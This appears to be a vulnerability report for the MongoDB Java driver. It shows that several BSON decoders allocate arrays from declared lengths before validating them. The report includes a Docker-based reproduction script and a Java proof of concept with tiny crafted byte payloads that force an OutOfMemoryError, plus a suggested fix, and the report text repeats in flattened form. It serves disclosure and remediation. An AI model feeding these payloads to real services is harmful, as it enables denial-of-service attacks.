Summary
Some BSON decoding paths allocate byte arrays directly from declared BSON lengths before checking whether the input contains enough bytes to satisfy that declaration.
This can turn a very small malformed BSON input into a large allocation and OutOfMemoryError, rather than a controlled BSON parse rejection.
The paths I observed are:
BsonBinaryReader.doReadBinaryData()
BasicBSONDecoder.readObject(InputStream)
LazyBSONDecoder.readObject(InputStream)
Code paths
For binary fields, BsonBinaryReader.doReadBinaryData() reads the binary length, allocates new byte[numBytes], and then reads into that array:
protected BsonBinary doReadBinaryData() {
int numBytes = readSize();
byte type = bsonInput.readByte();
...
byte[] bytes = new byte[numBytes];
bsonInput.readBytes(bytes);
return new BsonBinary(type, bytes);
}
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BsonBinaryReader.java#L134-L147
For stream decoding, BasicBSONDecoder.readFully(...) reads the first four bytes as the document size and immediately allocates that size:
private byte[] readFully(final InputStream input) throws IOException {
byte[] sizeBytes = new byte[4];
Bits.readFully(input, sizeBytes);
int size = Bits.readInt(sizeBytes);
byte[] buffer = new byte[size];
System.arraycopy(sizeBytes, 0, buffer, 0, 4);
Bits.readFully(input, buffer, 4, size - 4);
return buffer;
}
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/BasicBSONDecoder.java#L100-L108
LazyBSONDecoder.decode(InputStream, BSONCallback) has the same allocation-before-body-read shape:
byte[] documentSizeBuffer = new byte[BYTES_IN_INTEGER];
int documentSize = Bits.readInt(in, documentSizeBuffer);
byte[] documentBytes = Arrays.copyOf(documentSizeBuffer, documentSize);
Bits.readFully(in, documentBytes, BYTES_IN_INTEGER, documentSize - BYTES_IN_INTEGER);
Reference:
https://github.com/mongodb/mongo-java-driver/blob/8aa32421452e77e1c33f3ee79a2be76067a6377b/bson/src/main/org/bson/LazyBSONDecoder.java#L54-L58
Expected behavior
Malformed BSON with impossible or unavailable declared lengths should fail with a controlled BSON parse exception before allocating an array of the declared size.
Actual behavior
A compact input can cause OutOfMemoryError before the parser rejects the malformed body.
Reproduction
Prerequisites
- Docker
- Network access to clone this repository
- Network access for Gradle dependency resolution
File: repro.sh
#!/usr/bin/env bash
set -euo pipefail
REPO_URL="${REPO_URL:-https://github.com/mongodb/mongo-java-driver.git}"
TARGET_REF="${TARGET_REF:-8aa32421452e77e1c33f3ee79a2be76067a6377b}"
WORKDIR="$(mktemp -d)"
cleanup() {
rm -rf "$WORKDIR"
}
trap cleanup EXIT
CHECKOUT="$WORKDIR/mongo-java-driver"
REPRO_DIR="$WORKDIR/repro"
git clone --filter=blob:none "$REPO_URL" "$CHECKOUT"
git -C "$CHECKOUT" checkout --detach "$TARGET_REF"
mkdir -p "$REPRO_DIR"
cat > "$REPRO_DIR/Dockerfile" <<'EOF'
FROM eclipse-temurin:17-jdk
RUN apt-get update \
&& DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends bash ca-certificates \
&& rm -rf /var/lib/apt/lists/*
WORKDIR /repro
COPY BsonDeclaredLengthAllocationPoc.java verify.sh ./
RUN chmod +x /repro/verify.sh
ENTRYPOINT ["/repro/verify.sh"]
EOF
cat > "$REPRO_DIR/BsonDeclaredLengthAllocationPoc.java" <<'EOF'
import org.bson.BasicBSONDecoder;
import org.bson.LazyBSONDecoder;
import org.bson.RawBsonDocument;
import org.bson.codecs.BsonDocumentCodec;
import java.io.ByteArrayInputStream;
public final class BsonDeclaredLengthAllocationPoc {
public static void main(final String[] args) throws Exception {
byte[] binaryLengthPayload = new byte[] {
0x0d, 0x00, 0x00, 0x00,
0x05, 0x62, 0x00,
(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f,
0x00,
0x00
};
byte[] streamLengthOnly = new byte[] {
(byte) 0xff, (byte) 0xff, (byte) 0xff, 0x7f
};
expectOutOfMemory("nested binary declared length", () ->
new RawBsonDocument(binaryLengthPayload).decode(new BsonDocumentCodec()));
expectOutOfMemory("BasicBSONDecoder stream declared length", () ->
new BasicBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));
expectOutOfMemory("LazyBSONDecoder stream declared length", () ->
new LazyBSONDecoder().readObject(new ByteArrayInputStream(streamLengthOnly)));
System.out.println("SUCCESS: declared lengths caused allocation failure before controlled rejection");
}
private static void expectOutOfMemory(final String label, final ThrowingRunnable action) throws Exception {
try {
action.run();
throw new IllegalStateException("Expected OutOfMemoryError for " + label);
} catch (OutOfMemoryError expected) {
System.out.println("OOM " + label + ": " + expected.getClass().getSimpleName()
+ " " + expected.getMessage());
}
}
private interface ThrowingRunnable {
void run() throws Exception;
}
}
EOF
cat > "$REPRO_DIR/verify.sh" <<'EOF'
#!/usr/bin/env bash
set -euo pipefail
TARGET_REPO="${TARGET_REPO:-/target-repo}"
WORK_ROOT="/work"
WORK_REPO="$WORK_ROOT/target"
CLASS_DIR="$WORK_ROOT/classes"
OUTPUT_FILE="$WORK_ROOT/output.txt"
rm -rf "$WORK_ROOT"
mkdir -p "$WORK_ROOT" "$CLASS_DIR"
cp -a "$TARGET_REPO" "$WORK_REPO"
cd "$WORK_REPO"
./gradlew --no-daemon :bson:jar -x test > "$WORK_ROOT/gradle-build.log" 2>&1 || {
cat "$WORK_ROOT/gradle-build.log"
exit 1
}
jars=("$WORK_REPO"/bson/build/libs/*.jar)
CP="$(IFS=:; echo "${jars[*]}")"
javac -cp "$CP" /repro/BsonDeclaredLengthAllocationPoc.java -d "$CLASS_DIR"
java -Xmx64m -cp "$CP:$CLASS_DIR" BsonDeclaredLengthAllocationPoc > "$OUTPUT_FILE" 2>&1
cat "$OUTPUT_FILE"
grep -F "OOM nested binary declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM BasicBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "OOM LazyBSONDecoder stream declared length" "$OUTPUT_FILE" >/dev/null
grep -F "SUCCESS: declared lengths caused allocation failure before controlled rejection" "$OUTPUT_FILE" >/dev/null
EOF
docker build -t mongo-java-driver-bson-declared-length-repro "$REPRO_DIR"
docker run --rm \
-e TARGET_REPO=/target-repo \
-v "$CHECKOUT:/target-repo:ro" \
mongo-java-driver-bson-declared-length-repro
Command
chmod +x repro.sh
./repro.sh
Observed output
OOM nested binary declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM BasicBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
OOM LazyBSONDecoder stream declared length: OutOfMemoryError Requested array size exceeds VM limit
SUCCESS: declared lengths caused allocation failure before controlled rejection
Suggested fix direction
Before allocating arrays from declared BSON lengths, reject lengths that are impossible for the current input or above an appropriate maximum. For stream decoders, this likely means validating the declared document length before allocating the full document buffer.
Summary
Some BSON decoding paths allocate byte arrays directly from declared BSON lengths before checking whether the input contains enough bytes to satisfy that declaration.
This can turn a very small malformed BSON input into a large allocation and
OutOfMemoryError, rather than a controlled BSON parse rejection.The paths I observed are:
BsonBinaryReader.doReadBinaryData()BasicBSONDecoder.readObject(InputStream)LazyBSONDecoder.readObject(InputStream)Code paths
For binary fields,
BsonBinaryReader.doReadBinaryData()reads the binary length, allocatesnew byte[numBytes], and then reads into that array:Reference:
For stream decoding,
BasicBSONDecoder.readFully(...)reads the first four bytes as the document size and immediately allocates that size:Reference:
LazyBSONDecoder.decode(InputStream, BSONCallback)has the same allocation-before-body-read shape:Reference:
Expected behavior
Malformed BSON with impossible or unavailable declared lengths should fail with a controlled BSON parse exception before allocating an array of the declared size.
Actual behavior
A compact input can cause
OutOfMemoryErrorbefore the parser rejects the malformed body.Reproduction
Prerequisites
File:
repro.shCommand
Observed output
Suggested fix direction
Before allocating arrays from declared BSON lengths, reject lengths that are impossible for the current input or above an appropriate maximum. For stream decoders, this likely means validating the declared document length before allocating the full document buffer.